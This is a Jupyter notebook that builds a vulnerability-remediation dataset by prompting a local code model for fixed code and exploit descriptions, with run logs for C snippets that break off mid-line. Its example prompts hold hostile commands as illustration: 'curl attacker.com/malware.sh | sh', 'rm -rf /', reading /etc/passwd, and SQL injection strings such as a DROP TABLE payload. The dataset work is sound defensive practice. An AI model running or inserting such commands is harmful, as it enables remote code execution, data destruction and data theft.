In [1]:
import json
import os
from ollama import chat
from ollama import ChatResponse

In [2]:
# Ollama model name
model_name = "qwen2.5-coder:32b"

In [3]:
# Programming languages
languages = [
    "C", "JAVA", "PYTHON", "SQL", "C#", "JAVASCRIPT", "RUBY",
    "TYPESCRIPT", "C++", "KOTLIN", "RUST", "GO", "PHP", "SCALA"
]

In [4]:
# Prompt template
prompt_template = """
Given the following inputs:
- Vulnerability Type: {vulnerability_type}
- Vulnerable Code: {vulnerable_code}
- CVSS Score: {cvss_score}

Your task is to:
1. Provide a fully secure, fixed version of the vulnerable code.
2. List 2 to 3 realistic ways the vulnerable code can be exploited or abused.

STRICT RULES:
- Output ONLY a valid JSON object.
- Do NOT add any explanations, markdown, or comments.
- Escape all double quotes properly.
- Use the following keys in the final JSON:
    - "vulnerability_type": same as input
    - "vulnerability_code": same as input (escaped)
    - "cvss_score": same as input
    - "fixed_code": remediated and secure version of the code
    - "exploit_ways": a list of 2 or 3 strings, each describing a way the vulnerability could be exploited

JSON FORMAT EXAMPLE:
{{
    "vulnerability_type": "Command Injection",
    "vulnerability_code": "# Python example\\ndef unsafe():\\n    import os\\n    cmd = input(\\\"Enter command: \\\")\\n    os.system(cmd)",
    "cvss_score": 8.6,
    "fixed_code": "# Python example\\ndef safe():\\n    import subprocess\\n    allowed = ['ls', 'whoami']\\n    cmd = input(\\\"Enter command: \\\")\\n    if cmd in allowed:\\n        subprocess.run([cmd])\\n    else:\\n        print(\\\"Not allowed\\\")",
    "exploit_ways": [
        "User could input 'rm -rf /' to delete system files.",
        "Could use 'curl attacker.com/malware.sh | sh' to execute remote malicious code.",
        "Could chain commands like 'ls; cat /etc/passwd' to leak sensitive files."
    ]
}}
"""

In [5]:
# Output directory
os.makedirs("Phase-3-Data", exist_ok=True)

In [6]:
# Retry logic
MAX_RETRIES = 2

In [7]:
# System + few-shot prompts
system_prompt = (
    "You are a cybersecurity assistant.\n"
    "Given a vulnerable code snippet, you must return a valid JSON object with:\n"
    "- The same vulnerability type and code\n"
    "- A realistic CVSS score (unchanged)\n"
    "- A fixed version of the code\n"
    "- 2–3 possible exploit strategies\n"
    "Do NOT include explanations or formatting — just clean JSON output."
)
few_shot = {
    "role": "user",
    "content": (
        "Example:\n"
        "{\n"
        "  \"vulnerability_type\": \"SQL Injection\",\n"
        "  \"vulnerability_code\": \"# Python example\\ndef get_user():\\n    import sqlite3\\n    conn = sqlite3.connect('users.db')\\n    user = input(\\\"Enter username: \\\")\\n    query = \\\"SELECT * FROM users WHERE username = '%s'\\\" % user\\n    conn.execute(query)\",\n"
        "  \"cvss_score\": 7.4,\n"
        "  \"fixed_code\": \"# Python example\\ndef get_user():\\n    import sqlite3\\n    conn = sqlite3.connect('users.db')\\n    user = input(\\\"Enter username: \\\")\\n    query = \\\"SELECT * FROM users WHERE username = ?\\\"\\n    conn.execute(query, (user,))\",\n"
        "  \"exploit_ways\": [\n"
        "    \"An attacker can input 'admin' OR '1'='1' to bypass authentication.\",\n"
        "    \"They can use 'UNION SELECT' to extract data from other tables.\",\n"
        "    \"Input like '; DROP TABLE users' can delete critical data.\"\n"
        "  ]\n"
        "}"
    )
}

In [10]:
# Main loop
for language in languages:
    print(f"\nGenerating for: {language}")
    with open(f"./Phase-2-Data/{language.lower()}.json", "r") as f:
        lang_dict = json.load(f)
        print(f"Loaded: Phase-2-Data/{language.lower()}.json as type {type(lang_dict)}")
        print(f"Total keys: {len(lang_dict)}")
    results = {}

    for k,v in lang_dict.items():
        if v["output"]["score"] <= 0.0:
            print(f"[{language}] Key {k} - Skipped: Already safe code")
            continue
        else:
            vulnerability_type = v["output"]["type"]
            vulnerable_code = v["input"]
            cvss_score = v["output"]["score"]

            user_prompt = prompt_template.format(vulnerability_type=vulnerability_type, vulnerable_code=vulnerable_code, cvss_score=cvss_score)

            for attempt in range(MAX_RETRIES):
                try:
                    response: ChatResponse = chat(model=model_name, messages=[
                        {'role': 'system', 'content': system_prompt},
                        few_shot,
                        {'role': 'user', 'content': user_prompt}
                    ])

                    reply = response['message']['content'].strip()
                    parsed_json = json.loads(reply)

                    results[k] = parsed_json
                    print(f"[{language}] Key {k} - Success")
                    break

                except Exception as e:
                    if attempt == MAX_RETRIES - 1:
                        print(f"[{language}] Key {k} - Failed: {e}")
                    else:
                        print(f"Retrying [{language}] Key {k} due to: {e}")
                    continue

    # Save results
    with open(f"Phase-3-Data/{language.lower()}.json", "w") as f:
        json.dump(results, f, indent=4)
    print(f"Saved: Phase-3-Data/{language.lower()}.json")


Generating for: C
Loaded: Phase-2-Data/c.json as type <class 'dict'>
Total keys: 90
Retrying [C] Key c_0 due to: Expecting ',' delimiter: line 3 column 115 (char 166)
[C] Key c_0 - Success
[C] Key c_1 - Success
[C] Key c_2 - Success
[C] Key c_3 - Success
[C] Key c_4 - Success
[C] Key c_5 - Success
[C] Key c_6 - Success
[C] Key c_7 - Success
[C] Key c_8 - Success
[C] Key c_9 - Success
[C] Key c_10 - Success
[C] Key c_11 - Success
[C] Key c_12 - Success
[C] Key c_13 - Success
[C] Key c_14 - Success
[C] Key c_15 - Success
[C] Key c_16 - Success
[C] Key c_17 - Success
[C] Key c_18 - Success
[C] Key c_19 - Success
[C] Key c_20 - Success
[C] Key c_21 - Success
[C] Key c_22 - Success
[C] Key c_23 - Success
Retrying [C] Key c_24 due to: Invalid \escape: line 5 column 140 (char 469)
[C] Key c_24 - Success
[C] Key c_25 - Success
[C] Key c_26 - Success
[C] Key c_27 - Success
[C] Key c_28 - Success
[C] Key c_29 - Success
[C] Key c_30 - Success
[C] Key c_31 - Success
[C] Key c_32 - Success
[C] Key